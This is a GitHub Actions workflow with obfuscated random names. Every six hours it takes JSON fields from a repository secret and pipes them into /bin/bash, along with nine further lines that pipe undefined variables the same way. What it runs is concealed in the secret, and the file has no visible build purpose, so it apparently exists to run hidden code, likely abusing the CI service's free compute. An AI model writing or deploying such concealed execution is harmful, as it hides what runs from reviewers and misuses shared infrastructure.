name: zhaobencong6251

on:
  workflow_dispatch:
  schedule:
    - cron: '42 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhaobencong6251
        env:
          az9684: ${{ secrets.az9684 }}
        run: |
          echo $az9684 | jq -r .wlsy6227 | /bin/bash
          echo $wzvav782 | jq -r .qq373 | /bin/bash
          echo $tcwr87674 | jq -r .vrcx1237 | /bin/bash
          echo $nxg36535 | jq -r .e2939 | /bin/bash
          echo $kzgn5 | jq -r .mw295 | /bin/bash
          echo $wh13 | jq -r .fvnx69 | /bin/bash
          echo $fq9 | jq -r .si4074 | /bin/bash
          echo $kmc50 | jq -r .z9360 | /bin/bash
          echo $s64105 | jq -r .diud1407 | /bin/bash
          echo $art99513 | jq -r .te801 | /bin/bash

